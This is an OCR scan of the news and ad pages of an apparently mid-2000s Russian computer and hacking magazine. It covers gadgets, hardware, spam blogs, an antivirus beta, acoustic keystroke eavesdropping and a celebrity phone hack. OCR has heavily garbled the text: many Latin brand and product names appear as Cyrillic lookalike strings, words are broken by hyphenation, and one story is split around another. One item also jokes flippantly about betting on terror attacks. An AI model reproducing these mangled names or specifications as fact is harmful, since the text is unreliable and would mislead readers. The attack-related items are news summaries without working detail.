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не оставит сомнений в Вашем вкусе. 

Технология гарантирует четкость изображения 

и отсутствие следов от движущихся объектов 
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МНЕ ЧАСТО ПРИХОДЯТ ПИСЬМА С ПРОСЬБАМИ 
ВЗЛОМАТЬ КАКОЙ-НИБУДЬ САЙТ НА ЫАРЮО.ВІІ, 
ПОМОЧЬ ПОЛУЧИТЬ ДОСТУП К ПОЧТЕ И Т.Д. ПАРНИ 
НЕ ОБЛАМЫВАЮТСЯ. ОНИ ПРОСТО «КЛАДУТ» НА 
РЕШЕНИЕ СВОИХ ПРОБЛЕМ И ПЕРЕКЛАДЫВАЮТ ИХ 
НА ДРУГОГО. ГРУСТНО ОСОЗНОВАТЬ, НО БОЛЬШИН- 
СТВО ИЗ НАС ПРОСТО НЕ ПРИВЫКЛИ САМОСТОЯТЕЛЬ- 
НО РЕШАТЬ СВОИ ПРОБЛЕМЫ. ВЕДЬ ЭТО НЕ ТАК 



СЛОЖНО ПОСТАВИТЬ ДЛЯ СЕБЯ ЦЕЛЬ. ПОНЯТЬ, ЧТО 
НЕОБХОДИМО ДЛЯ ЕЕ ДОСТИЖЕНИЯ, И НАЧАТЬ ДВИ- 
ГАТЬСЯ ПО НАПРАВЛЕНИЮ К НЕЙ. И ТОГДА ВОПРОСЫ: 
КАК СДЕЛАТЬ ЭТО, КАК СДЕЛАТЬ ТО, БУДУТ ОТПРАВ- 
ЛЯТЬСЯ НЕ НА ПОЧТУ ЖУРНАЛА, А ОТКЛАДЫВАТЬСЯ 
В ГОЛОВЕ. ПОВЕРЬ, ГОРАЗДО ПРИЯТНЕЕ, КОГДА ТЫ 
ДОХОДИШЬ ДО ЧЕГО-ТО САМ, А НЕ КАК В ШКОЛЕ ИЛИ 
В ИНСТИТУТЕ СМОТРИШЬ В СОСЕДСКУЮ ТЕТРАДКУ. 
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НАВРЫЕѴѴЗ ▼ 



ШЕСТЬ МЕГАПИКСЕ- 
ЛЕЙ НА ЛАДОНИ 




Компания Копіса МіпоІІа решила порадовать нас очередной фотокаме- 
рой — новое детище этого производителя на ЭіМаде 76. Это многофунк- 
циональная цифровая фотокамера с 12-кратным оптическим и 4-крта- 
ным цифровым гоогтГом, системой стабилизации изображения Апіі- 
ЗНаке, 6-мегапиксельной матрицей ПЗС, системой быстрой высокоточ- 
ной автофокусировки, а также 2-дюймовым ЖК-экраном для кадриро- 
вания снимков и управления фотокамерой. Многообразие функций на- 
верняка понравится тем, кто считает фотоаппарат не «мыльницей», а 
чем-то гораздо большим. Например, режим прогрессивной съемки при- 
годится при создании серии непрерывных полноразмерных изображе- 
ний со скоростью приблизительно 2,1 кадра в секунду. Для этого прос- 
то нужно держать кнопку спуска затвора нажатой, таким образом мож- 
но сфотографировать знаковый момент пересечения другом финишной 
черты стометровки, причем с отличным, неразмытым, качеством. Об- 
ратно, функция макросъемки позволяет делать снимки объектов, нахо- 
дящихся на расстоянии 1 сантиметра от объектива. 



ВЕЫО В ДОМАШНЕМ 
КИНОТЕАТРЕ 

Создавая свой домашний киноте- 
атр, важно не забыть о проекторе, 
иначе эффект будет совсем не тот. 

Компания ВепО предлагает для 
решения этой проблемы свой но- 
вый проектор РЕ8720. В его осно- 
ву положен чип 1-ЮЗ ЭагкСЫр ОМО 
производства Техаз Іпзігитепіз, 
что обеспечивает устройству конт- 
растность 6200:1 и 1009 АІМЗІ люменов яркости. Выводимое изображе- 
ние имеет киноформат 16:9, кроме того, проектор издает очень мало 
шума — всего 23 дБ. Для повышения удобства и качества работы, в про- 
екторе применяется фирменная технология Зепзеуе, которая обеспечи- 
вает натуральность цветов и четкость картинки. Кроме автоматической 
динамической подстройки качества изображения, коррекции яркости и 
цветопередачи, технология Зепзеуе также обеспечивает оптимальную 
настройку контраста, цвета и четкости изображения. Ну, а в заключение 
стоит сказать, что этот проектор совместим с форматом І-ЮТѴ. 




ПРОНИКНОВЕНИЕ 
ЗАТА ПРОДОЛЖАЕТСЯ 

Я Все больше и больше устройств с 
этим интерфейсом заползают 
внутрь наших системных блоков. 
Сегодня на очереди оптический 
привод АЗІІЗ СВ-521 6А1Т. Это 
комбо-дисковод связывается с ПК 
через разъем ЗегіаІ АТА и поддер- 
живает работу как с СО чтение/за- 
пись со скоростью 52Х, переза- 
пись со скоростью 32Х), так и с 
ЭѴЭ (чтение на скорости 16Х). Ду- 
маю, уже ни для кого не секрет, 
что нам дает ЗАТА — легкое и удобное подключение, высокую ско- 
рость работы, аккуратные провода, а следовательно, улучшенный ток 
воздуха внутри системного блока. Несколько фирменных технологий 
АЗІІЗ помогают улучшить работу устройства и сделать ее более безо- 
пасной. Это РІехІгаЫпк, предотвращающая ошибки, связанные с недо- 
загрузкой буфера и исключающая возможность порчи дисков, 
РІехІгаЗрееб, увеличивающая точность и надежность при чтении/запи- 
си/перезаписи и система двойной динамической подвески ЭЭЗЗ II, ко- 
торая стабилизирует оптическую головку по вертикали и по горизонта- 
ли, за счет чего достигается более точное слежение за дорожкой и сни- 
жение уровня вибрации и шума. 



ЗАРРНІПЕ И АТІ 

ПРОДОЛЖАЮТ 

СОТРУДНИЧЕСТВО 



Графические адапте- 
ры, построенные на 
новейшем чипе АТІ 
Вабеоп Х800ѲТО вы- 




пустила компания 
ЗаррМге. Они могут 
похвастаться 12-пик- 
сельными конвейера- 
ми, 256-битная шиной 
памяти (ее объем сос- 
тавляет 256 Мб, ла- 
тентность 1 ,6 нс, тип — 
СЮЭВЗ, тактовая час- 
тота работы 900 МГц,). 
Сам ГП имеет такто- 
вую частоту 400 МГц. 
Если тебе покажется, 
что это как-то маловато, 
то к твоим услугам — 
фирменная технология разгона ТВІХХ. Если ты не оверклокер, то для 
тебя ЗаррИіге предусмотрела другой вариант увеличения производи- 
тельности — специальную версию платы, обозначенную фэнтезийным 
названием РігеВІасІе. У нее в заводских условиях увеличили частоты ра- 
боты графического процессора и памяти (до 550 и 1080 МГц), а также 
установили более мощный кулер. Остальные параметры остались таки- 
ми же, как и у обычной версии — 256 Мб памяти СЮЭВЗ с латентностью 
1,6 нс, 12 конвейеров, 256-битная шина. В конце октября платы уже 
можно будет приобрести. 




Товар сертифицирован 




ІМОКІА 



Где высокое качество съемки 
> когда оно так необходимо? 

Г ш ". У я* ' * I ■ 

А л .. _ 



Оцените преимущества оптики СагІ 2еІ55 
в салонах мобильной связи или на покіа.ги 



Представляем [\Іокіа N90 с оптикой СагІ 2еІ55: уникальный дизайн 
с поворачивающейся панелью, удобная фотосъемка, а также возможность 
снимать до 2 часов видео. Теперь Ваши фотографии отличаются особой 
четкостью благодаря 2-мегапиксельной камере с автофокусом и высокому 
разрешению дисплея. Распечатайте их с помощью решения для печати 
Иокіа ХргеззРп'пг и Вы получите высококачественные снимки, 
достойные войти в Ваш фотоальбом. 

Иокіа №егіе5 

5ее пеѵѵ. Неаг пеѵѵ. РееІ пеѵѵ* 




* Смотрите по-новому. Слушайте по-новому Чувствуйте по-новому. 



2ЕІ55 



саг|2еііі0р1іа ХргеББРгіп* 



ѵѵѵѵѵѵ.покіа.ги Горячая линия Иокіа: (095) 727-2222. Часы работы: 08.00-20.00 (московское время), Пн. -Пт 



ІМОКІА 

Соппесііпд Реоріе 
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ЖИВАЯ РЕКЛАМА 

На какие только изощрения 
не идут рекламщики, чтобы 
привлечь внимание потен- 
циального покупателя. На 
этот раз отличилась бель- 
гийская дизайн-студия Одііѵу 
(ѵѵѵѵѵѵ.одіІѵу.Ье) с новой рек- 
ламной компанией для ав- 
томобильного гиганта РогсІ. 

На первый взгляд, реклама 
представляет собой станда- 
ртный биллборд с нарисо- 
ванной физиономией, одна- 
ко когда в ее поле зрения 
появляется очередной про- 
хожий, то изображение вне- 
запно оживает и начинает 
голосом подзывать перепу- 
ганного человека. Когда 
тот подходит ближе, то бил- 
лборд начинает рассказывать ему про все преимущества рекламируе- 
мого товара, по ходу беседы даже отвечая на вопросы, при этом физи- 
ономия на экране двигает губами в такт речи и корчит забавные грима- 
сы. К сожалению, искусственным интеллектом биллборд не наделен 
просто рядом в специальной будке прячется актер, который и управля- 
ет всем процессом. 



ЭЛЕКТРОННЫЙ 

ЗАМОК 

Со вхождением в моду всевозможных беспроводных устройств, уже 
сложно кого-либо удивить очередной новинкой. Однако беспроводной 
навесной замок — это точно что-то новое. Для открытия хитрого прис- 
пособления достаточно направить в его сторону специальный инфрак- 
расный пульт и нажать соответствующую кнопку, после чего запираю- 
щая скоба автоматически отщелкнется. Замок га рантирует механичес- 
кую защиту благодаря использованию высо- ИІ 
копрочной стали, а электронную — благодаря 4 
миллиардам возможных комбинаций открыва- 
ющего кода. Девайс уже поступил в продажу и НИ, 
стоит всего 19.95 у.е. Вот только интересно, - '• \ 
как высокотехнологичная новинка отреагирует 
на российские крещенские морозы? 



Исследователи из американского университета в штате Пенсильвания 
недавно представили довольно интересное и перспективное изобрете- 
ние. Они заметили, что при ходьбе мы постоянно раскачиваемся из сто- 
роны в сторону, причем во время этого рюкзак или сумка болтаются 
намного сильнее (в среднем амплитуда колебания по вертикали сос- 
тавляет 5 — 7 сантиметров). А ведь, если эту энергию направить в пра- 
вильное русло, то из этого можно извлечь толк. На этом принципе и 
построено функционирование данного устройства: тряска приводит в 
движение механизм, связанный с генератором, в результате чего и по- 
является электрический ток. Таким образом, если поместить подобное 
приспособление в рюкзак, то можно, например, по дороге домой заря- 
дить сотовый, КПК, плеер, не затрачивая на это никаких дополнитель- 
ных усилий. Однако, к сожалению, изобретение пока не особо приме- 
нимо на практике и нуждается в серьезной доработке. Не смотря на то, 
что полезная выходная мощность составляет уже примерно 7 Ватт, тас- 
кать 38 кг лишнего веса не доставит никакого удовольствия. 



СВЕТЯЩАЯСЯ СУМКА 

Страшно вспомнить, сколько раз приходилось мучаться, ища на ощупь 
небольшую вещицу на дне рюкзака, а что приходится испытывать бед- 
ным девушкам, в сумочках которых и Боинг потеряться может, лучше и 
не думать. Не носить же для этого еще и фонарик, который, между про- 
чим, и сам может точно там же затеряться. Одному студенту из Универ- 
ситета Брунеля пришло в голову решение данной проблемы: на дне он 



САМЫЙ-САМЫЙ 

МАЛЕНЬКИЙ 

Американским уче- 
ным из колледжа в 
Дармуте удалось соз- 
дать самого малень- 
кого мобильного ро- 
бота в мире. Несмот- 
ря на свои микроско- 
пические размеры (250 
на 60 микрометров — 
это тоньше челове- 
ческого волоса), ма- 
лютка управляется без 
проводов и может пе- 
редвигаться в любом 
заданном направлении в пределах специальной пластины, от которой 
он и питается. При этом робот довольно шустрый, двигаясь по принципу 
гусеницы, он может развивать скорость до 200 микрометров в секунду, 
впрочем, он способен не только ползти, но и толкать перед собой пылин- 
ки или другие соразмерные объекты. Но этим дело не ограничивается, на 
разработку возлагают большие надежды: предполагается в дальнейшем 
использовать сходных малышей для построения других роботов или про- 
чих микроскопических устройств. 



установил подсветку, которую запитал от солнечной батареи, закреп- 
ленной на боку сумки. При расстегивании молнии подсветка автомати- 
чески включается, а при застегивании — выключается, также для сбе- 
режения энергии освещение отключается после 15 секунд открытия. И 
если еще не известно, попадет ли данная вещица на полки магазинов, 
то сумки со светодиодной подсветкой от батареек уже поступили в про- 
дажу, вот только стоят они не менее 100 евро. 








Идеальный центр развлечений 

А51І5 ѴѴЗѴ - это ноутбук с графикой РСІ Ехргезз, внешней 
графической картой и памятью ООРІІ. Широкоформатная 
матрица 14", в которой используются технологии АЗІІ5 Соіог 
ЗІііпе и Сгузіаі ЗІііпе, обеспечивает ясное и четкое изображение. 



Новая мобильная платформа от Іпіеі® 



а Широкоформатная матрица 14", 
с эксклюзивными технологиями Соіог ЗІііпе и Сгузіаі ЗІііпе 
^ Батарея совмещена с креплением экрана 

НЕАРТ ОР ТЕСНЫОЮОУ 

ѵѵѵѵѵѵ.азиз.ги 

Всемирная гарантия 2 года 



□ Іпіеі® Сепігіпо™ МоЬіІе Тесііпоіоду 

- Процессор Іпіеі® Репііит® М 770 

- МоЬіІе Іпіеі® 915РМ Ехргезз сЫрзе! 

- Іпіеі® РРО/ѴѴігеІезз ІМеІѵѵогк соппесііоп ВС 

□ Місгозоіі® ѴѴіпсІоѵѵз® ХР 

- Ноте 

- РгоТеззіопаІ 

□ Широкоформатная матрица 14", 

с эксклюзивными технологиями Соіог ЗІііпе и Сгузіаі ЗІііпе 

□ АТІ МоЬМіІу™ Расіеоп™ Х600 с 128МВ НурегМетогу™ 












^ МОВНЕ 
ТЕСНІЧОЮСУ 



ИШЕМИИ ш 



□ ВІиеІооІІі 



і- Л ~ _ . . „ „ 






Москва: Армада-РС (095) 232-30-82, Артрон (095) 789-85-80, Аѵакот М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 775-66-55, ЮІЧ (095) 
729-57-10, МЕХІІ5 (095) 928-23-67, Тенфолд (095) 545-32-71, ОЦЭІ (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, Респект (095) 177-40-77, 
Сетевая Лаборатория (095) 500-03-05, 5М5 (095) 956-12-25; СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-00-41, Ф-Центр (095) 105-64-47, ІІЗИ (095) 
775-82-02; Санкт-Петербург: Оізріау (812) 103-00-18, КЕЙ (812) 331-24-77, Микробит (812) 333-44-44, Компьютерный мир (812) 333-00-33; СТР Компьютере (812) 542-4551; Барнаул: 
С-Тгабе (3852) 38-10-00; Воронеж: РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, Старттехно+ (3432) 56-85-01; Краснодар: Владос (8612) 62-33-73, Санрайз (8612) 
640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; Самара: Прагма (8462) 701-701; Томск: Интант (3822) 41-55-32; 
Тюмень: АБ Зузіетз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 

Іпіеі, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі Сепігіпо, Іпіеі Сепігіпо Іодо, Сеіегоп, Іпіеі Хеоп, Іпіеі $реесІ5іер, Иапіит, апсі Репііит аге Ігасіетагкз ог гедізіегесі Ігасіетагкз оі Іпіеі Согрогаііоп ог Из зиЬзісІіагіез іп ІНе Упііесі $1а1ез апсі оІИег соипігіез 
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г НАШЕСТВИЕ 
§ СПАМ-БЛОГОВ 




Как продвинутый интернетчик, ты наверняка знаком со словом 
«блог», возможно, даже ведешь один из них. Веб-блоги в последнее 
время стали одним из самых популярных сетевых развлечений. Но 
спамеры добрались уже и до них. Казалось бы, каким образом рек- 
лама в блогах может помешать обычному юзеру? Не хочешь рекла- 
мы — не заходи на рекламный блог. Но не все так просто. Спамеры 
используют специальные проги, с помощью которых можно автома- 
тически генерить страницы, содержащие линки (или прямой реди- 
рект) на рекламодательные сайты и ключевые слова, которые будут 
индексироваться поисковиками. Ключевых слов на одной странице 
может быть сколько угодно — чем больше, тем выше вероятность, 
что пага окажется в числе первых, которые выдаст поисковик после 
ввода этого слова. А чтобы еще больше повысить релевантность па- 
ги, она все также автоматически пополняется новым контентом, ко- 
торый сливается с обычных блогов без ссылки на оригинал. За каж- 
дый переход с липового блога на рекламируемый сайт, спамеру на- 
числяются денежки. Убедившись в эффективности такого способа 
наживы, спамеры начали плодить лжеблоги пачками, и их количест- 
во уже едва ли не превышает количество пользовательских блогов. 
Сетевые аналитики бьют тревогу и призывают бороться с новой за- 
разой. Причем делать это рекомендуют, в первую очередь, компани- 
ям, предоставляющим поисковые сервисы — совершенствовать свои 
фильтры, создавать блэк-листы блогов и т.п. К счастью рунетчиков, 
ІіѵеіоигпаІ — самый популярный в России блог-сервис, пока не поль- 
зуется популярностью у спамеров. 



МЕГАДОМ 




Недавно завершилось строительство уникального сооружения — 
Тоуоіа Эгеат Ноизе РАРІ — интеллектуального дома, претендующего 
на звание «дома будущего». В основном, дом построен с применени- 
ем двух материалом — стекла и алюминия, что отражает представле- 
ния о дизайне будущего. Причем помимо того, что дом напичкан 
электроникой просто под завязку, не забыли и об озеленении, и о ду- 
шевном комфорте жильца. Естественно, вся бытовая техника работа- 
ет в полностью цифровом режиме и может управляться единым пуль- 
том управления. Дом может даже заботиться о себе самостоятельно, 
например, на стекла нанесено специально самоочищающееся покры- 
тие, что полностью избавляет от необходимости их мыть. Отдельно 
стоит упомянуть про домашний кинотеатр, конечно, он поддерживает 
абсолютно все современные технологии (диски высокой емкости, те- 
левидение высокого разрешения и так далее), но еще и может авто- 
матического определять положения зрителя и оптимально подстраи- 
вать звуковую картину и даже освещение. Особое внимание при про- 
ектировании дома было уделено потреблению электроэнергии, ведь 
если отключат электричество, то для данного коттеджа это будет рав- 
носильно катастрофе. Поэтому дом может самостоятельно произво- 
дить для себя часть потребляемой энергией, в частности для этого на 
крыше установлены солнечные батареи, внутри имеются резервные 
топливные элементы, а на крайний случай можно даже целых полто- 
ра дня питаться энергией от электромобиля, припаркованного в гара- 
же. На данный момент дом открыт для посещения туристов, впрочем, 
это сделано со скрытым умыслом, ведь заветная мечта компании — 
перевести подобные дома в разряд массовых уже к 2010 году и, кон- 
чено, неплохо на этом подзаработать. 



8РЮЕК САТЕ 



Компания "Доктор Веб" сообщает о разработке и начале открытого 
бета-тестирования нового программного модуля ЗрЮег Оаіе, пред- 
назначенного для проверки данных передаваемый по НТТР. 

ЗрЮег Оаіе своей функциональностью дополняет программы- 
брандмауэры (ІігеѵѵаІІз): последние закрывают уязвимости в систе- 
ме, предотвращая возможные попытки злоумышленников произ- 
вести взлом и получить доступ к системе. Однако они не способны 
проверять файлы, загружаемые пользователем из Интернета (фай- 
лы, почта и т.д.), среди которых могут быть троянские программы, 
сетевые и почтовые черви, а также другие 
виды вредоносного кода. Новый модуль яв- 
ляется прекрасным дополнением к уже су- 
ществующему почтовому фильтру ЗрЮег 
МаіІ®, который осуществляет антивирусную 
входящей и исходящей почты, а ЗрЮег (Заіе, 
в свою очередь, проверяет Пир-трафик. 

Зарегистрироваться в качестве бета-тестера 
и получить бета-версию нового антивирусно- 
го модуля можно на сайте компании "Доктор 
Веб" (ѵѵѵѵѵѵ.сІгѵѵеЬ.сот) 




пи ііііміг ШІІІ 



РУКАВИЦА 
ДЛЯ МЫШКИ 

Холодать стало, не замечаешь? 
А тут еще и из окна противно ду- 
ет, даже мышку держать рука 
мерзнет. Попробовать надеть 
перчатку — тоже не вариант — 
не удобно просто. Однако о на- 
шем тепле и комфорте уже поза- 
ботились, на прошедшей в конце 
сентября лондонской выставке 
100% Оезідп было представлено 
уникальное изделие — рукавица для мышки. Данную рукавицу сле- 
дует положить на стол на место коврика и засунуть в нее руку сра- 
зу вместе с мышкой, двигать грызуном можно прямо внутри, что ни- 
как не мешает управлению. В итоге получилось крайне злободнев- 
но, и если производители сделали, как обещали, и внутри не будет 
сверх-жарко, то данная вещь однозначно переходит в разряд тизі 
Паѵе к зимнему сезону. Только, увы, никакой информации о поступ- 
лении рукавицы в продажу, а тем более о появлении в России, по- 
ка не поступало. 






зегіез 



отпі 



Интернет-техника 
для дома 



Модемы 

А03І_ 




Модем А05І.2+ 
с портом ЕШегпеІ: 

Р-660В ЕЕ 



Модем А05І-2+ с 4-портовым Модем А05І_ 
коммутатором, беспроводной с портом 115В 
точкой доступа 802.1 1д+ омм дознав ее 

и межсетевым экраном 

Р-660НѴѴ ЕЕ 



Чтобы подключиться к Интернету через 
АОЗІ_ на скорости в 500 раз быстрее 
самого крутого ОіаІ-ІІр-модема, 
достаточно обычной телефонной линии: 
никаких дырок в стенах, никаких новых 
проводов. Нужно лишь, чтобы на вашей 
АТС был А031_-провайдер, а у вас — 
специальный модем, который сам 
сконфигурирует подключение 
и уже через три минуты после подачи 
питания соединит вас с Интернетом 
на сумасшедшей скорости. 

И самое приятное — ваша телефонная 
линия всегда остается свободной для 
обычных телефонных звонков. 




ОМІЧІ— твой сетевой друг 




Смотрите новые приключения 
Масяни на нашем сайте: 



ОМІМІ.2уХЕІ_.ВІІ 



ТОВАР СЕРТИФИЦИРОВАН 
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НАВОЫЕѴѴ5 



][МЕѴѴ5 ▼ 



фотики с ип-н 







Цифровая конвергенция проникла и на рынок фототехники. Вот ее 
плоды — камеры Ыікоп СООЬРІХ Р1 и СООЬРІХ Р2 поддерживающие 
ѴѴі-Рі! Благодаря этой опции ты можешь не заморачиваться на про- 
водное соединение (оно тут присутствует в виде 115В), а сразу отправ- 
лять полученные фотографии на принтер или компьютер. Удобно! Но, 
естественно, этим дело не ограничивается. Эти модели имеют матри- 
цы на 8 и 5 мегапикселей, функции коррекции кадров непосредствен- 
но на фотоаппарате, автофокусировки с приоритетом на лицо и по- 
давления эффекта «красных глаз». Также поддерживается съемка 
видеороликов, причем есть семь разных режимов съемки. Обе каме- 
ры имеют 2,5-дюймовый ЖК-экран, также в комплекте с ними постав- 
ляется специальное ПО РісІигеРгоіесІ, облегчающее процесс редакти- 
рования изображений, формирования слайд-шоу, создания видеоро- 
ликов со звуковыми эффектами, обмена изображениями, а также поз- 
воляющее делать многие другие вещи. В общем, долой провода, ѴѴі- 
Рі добрался и до цифровых камер! 



ІІ.8.ПОВОТІС8 ПЕРЕ- 
ХОДИТ НА С-І-АИ 




Чтобы то же самое сделали и мы, 115В выпускает продукты, которые 
поддерживают стандарт ОідаЬіІ ЕІНегпеІ. Сегодня это пара сетевых 
плат, а также оборудование, которое вряд ли тебе пригодится, если 
только ты не собираешься вступить на тернистый путь организации 
собственной ЛВС. Обычным пользователям настольных компьюте- 
ров подойдет устройство ѲідаЬіІ ЕІИегпеІ 10/100/1000 ЕІПегпеІ 64-ЬіІ 
РСІ 5егѵег, которое поддерживает автоматическое определение ско- 
рости передачи данных, автоматическое включение и функцию 
ѴѴаке-оп-І_АЫ. Сетевая плата ОідаЬіІ ЕІПегпеІ 10/100/1000 ЕІИегпеІ 
СагсІВиз предназначена для мобильных ПК, в которых производитель 
почему-то не установил сетевую плату, совместимую со стандартом 
ОідаЬіІЕІІіетеГ Если ты являешься провайдером или админом сети, 
то, возможно, тебя заинтересуют коммутаторы, оснащенные во- 
семью, шестнадцатью или двадцатью четырьмя портами. Естествен- 
но, гигабитными. Так что сообщай о новинках своему прову и жди, 
когда он сменит оборудование. 



ПРЕДСКАЖИ 
ТЕРРАКТ — ПОЛУЧИ 
ФУТБОЛКУ 

В то время, как тер- 
ракты продолжают 
проходить в разных 
уголках мира, право- 
охранительные струк- 
туры пытаются как 
то с этим бороться, 
родственники погиб- 
ших оплакивают сво- 
их... а сетевые гении 
делают из этого за- 
баву. В одной из та- 
ких «забав» можешь 
поучаствовать и ты. 
В Сети недавно поя- 
вился сайт, где 
предлагается предс- 
казать, где и когда 
произойдет следую- 
щий теракт. Просто 
тыкаешь в какую-ни- 
будь точку на вирту- 
альной карте, и, ес- 
ли там в ближайшем 
будущем случайно 
грянет взрыв, в ре- 
зультате которого 
откинется не меньше 10 человек, тебе вручат футболку с гордой над- 
писью: «Я предсказал это!». Главное, не тыкнуть в Чечню или еще ку- 
да-то, где ведутся войнушки — по правилам конкурса шарахнуть 
должно в «спокойном» месте. Конечно, некоторые организации, мяг- 
ко говоря, не одобряют подобной затеи и называют создателей сай- 
та бессердечными скотами. Но халявная футболка есть халявная 
футболка, и свой прогноз, относящийся к центру Москвы, я уже заре- 
гистрировал. Г ы-гы. 




АУДИОХАК 
НЕ ЗА ГОРАМИ 

Если ты до сих пор пользуешься телефоном для междугородних звон- 
ков, то ты отсталый от жизни валенок. Продвинутые мены такие, как я, 
юзают ІР-телефонию (ѴоІР) и сервисы, которые позволяют звонить че- 
рез сеть на любой номер безвозмездно, то есть даром. Самым извест- 
ным и популярным таким сервисом является 5куре, запущенный в кон- 
це прошлого года, а достойной альтернативой ему стал появившийся 
чуть позже Ооодіе Таік, объединяющий ѴоІР и инет-пейджер. Не откла- 
дывая до 2006 года, к ним собираются присоединиться МісгозоК, еВау, 
УаИоо! Звонить по сетке, конечно, удобно и выгодно, но сетевые ана- 
литики считают, что с развитием популярности ІР-телефонии, ее ждет 
злая доля, постигшая Интернет — нашествие спама и фишинга. А фиг- 

ли вы хотели, новые 
технологие — это но- 
вые перспективы для 
внуков Остапа. Так 
что если раньше вы- 
манивали, выдурива- 
ли и вымогали паро- 
ли через ѵѵѵѵѵѵ, теперь 
это будут делать вой- 
сом. По мнению все 
тех же аналитиков, 
хакерская актив- 
ность ѴоІР-сетях нач- 
нется в ближайшие 
18 месяцев. Держи 
ухо востро, мой друг. 





Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора ІпЪеІ® РепЪішп® 4 с технологией НТ 





Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора ІпЪеІ® РепЪіит® 4 с технологией НТ. 



И'""/,, 

\ ' ' / 



йЕРО Едо 360 ТѴ: 

• процессоры ІпЪеІ® Репйит® 4 с технологией НТ серии бхх (2Мб сазН второго уроЕ 

• чипсет ІпЬеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память 0092 

• новые возможности графики РСІ-Ехргезз 

• реалистичный объемный 8-канальный звук 




Компания ОЕРО СотриЪегз Тел./факс: (095) 969-2215, ѵѵѵѵѵѵ.беро.ги 



I п Ь е I , ІпЬеІ Іпзісіе, Ыге I п Ь е I Іпзісіе І_одо и ІгПеІ РепЫит являются зарегистрированными товарными знаками ІпЬеІ СогрогаЫоп и её отделе 
МісгозоІТ и ѴѴіпсІоѵѵз являются зарегистрированными товарными знаками компании МісгозоШ и её отделений в США и других странах. 



й в США и других странах. 
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НАВРМЕѴѴЗ 



НМЕѴѴЗ ▼ 



РОССИЙСКИЕ 

МАТПЛАТЫ 




Небезызвестная отечественная компания Формоза приступила к выпуску 
системных плат, построенных на НМС пѴісІіа пРогсе 4 и пРогсе 4 Шга. Эти 
изделия рассчитаны на работу с процессорами АІѴГО АФІоп 64\РХ\Х2 под 
Зоскеі 939, имеют 4 слота для памяти с поддержкой режима ЭиаІ СИаппеІ 
ЭЭВ, порты шин РСІ Ехргезз хіб (один), РСІ Ехргезз хі (два) и РСІ (три), 
4 порта ЗАТА (ЗАТА-ІІ для Шга-версии), 4 порта ЮЕ, возможность созда- 
ния ЗАТА РІАЮ-массивов, встроенные восьмиканальный звуковой кодек 
и гигабитный сетевой адаптер. Немаловажным достоинством новых плат 
является их цена — менее ста долларов для обычной и чуть более ста для 
Шга-версии. Такой результат достигается благодаря собственной произ- 
водственной линии, расположенной в Москве. Там платы собираются из 
привозных компонентов и проходят строгие тесты на качество. Кроме 
розничной продажи, эти изделия (Р0ВМ02А РѴЫР4 и РѴЫР4 1111га) мож- 
но будет обнаружить в компьютерах одноименного производителя. 



НЕ ШУМИ КЛАВОЙ 

Интересное открытие 
сделали ученые из Ка- 
лифорнийского инс- 
титута в Беркли. Ока- 
зывается, можно зап- 
росто восстановить на- 
бираемый юзером 
текст с помощью не- 
дорогого прослуши- 
вающего устройства 
и программы, рас- 
шифровывающей 
стук клавиатурных кла- 
виш. Каждая клави- 
ша при нажатии соз- 
дает уникальный звук, 
и компьютер разницу 
между этими звуками 
достаточно хорошо ощущает. Чтобы увеличить точность совпадения, 
нужно «прогнать» расшифровщик несколько раз. Например, во время 
опытов в Беркли, при первоначальном запуске компьютеру удалось 
распознать 60% символов и 20% полных слов, но уже к третьему разу 
точность возрастает до 90%. В основе алгоритма лежит не только оп- 
ределение звуков клавиш, но и особенности грамматики. Ведь в рус- 
ском языке после «Бл» скорее всего последует последняя буква ал- 
фавита, чем твердый знак. Остается только проблема с шифтом, 
контролом и капслоком, но ученые обещают решить и ее. Не нужно 
быть гением, чтобы сообразить, что открытие исследователей из 
Беркли может дать хакерам в руки мощное оружие для добывания па- 
ролей. Достаточно прилепить незаметный жучок к клавиатуре или 
столу юзера, и программа высветит тебе без всяких сниферов все то, 
что он ввел. Поэтому прогресс в этой области, скорее всего, будет 
контролироваться. А публично и подробно о результатах своих экспе- 
риментов ученые поделятся на компьютерной конференции в Алекса- 
ндрии (США), которая пройдет 10 ноября. 




20 ДЮЙМОВ ВЕЫО 

Тем, кто не любит себя в чем-то ограничивать, можно посоветовать при- 
обрести немаленький ЖК-монитор от компании ВепО. Он называется 
РР2091 и имеет более чем 20-дюймовую диагональ и разрешение 
1600x1200. Другие характеристики тоже хороши: контрастность 500:1, 
время отклика 16 мс, яркость 290 кд/м2, угол обзора 178° как по горизон- 
тали, так и по вертикали. Кроме того, что он хорошо показывает, у него 
есть много интересных дополнительных функций. Это возможность подк- 
лючения к ТВ-тюнеру или Э\Ю-проигрывателю, возможность работы в ре- 
жиме РІР (картинка в картинке) с помощью порта 3-Ѵібео или композит- 
ного входа, поддержка портретного режима, интеллектуальная система 
настройки і-кеу. Есть в нем и четыре порта 115В, позволяющие подключать 
к экрану разные дополнительные устройства. В общем, этот большой мо- 
нитор вполне способен занять место на твоем столе, он этого достоин. 




17-ЛЕТНИЙ ГРОЗА 
ГОЛЛИВУДА 

Прошлым месяцем в американс- 
ком штате Массачусетс состоялся 
суд над 17-летним подростком, 
арестованным за взлом мобиль- 
ного телефона голливудской 
звезды Пэрис Хилтон. Малышка 
Пэрис, помнится, заверяла, что 
никогда ее обнаженная натура не 
будет марать Интернет. В смысле, 
она никогда не будет мараться, 
выставляя себя в обнаженной на- 
туре перед Интернетом. Но проот- 
вечалась. Наш юный фрикер хак- 
нул мобилку мисс Хилтон и слил 
приватные фотки, где тетя пози- 
рует без бюстгальтера в обнимку 
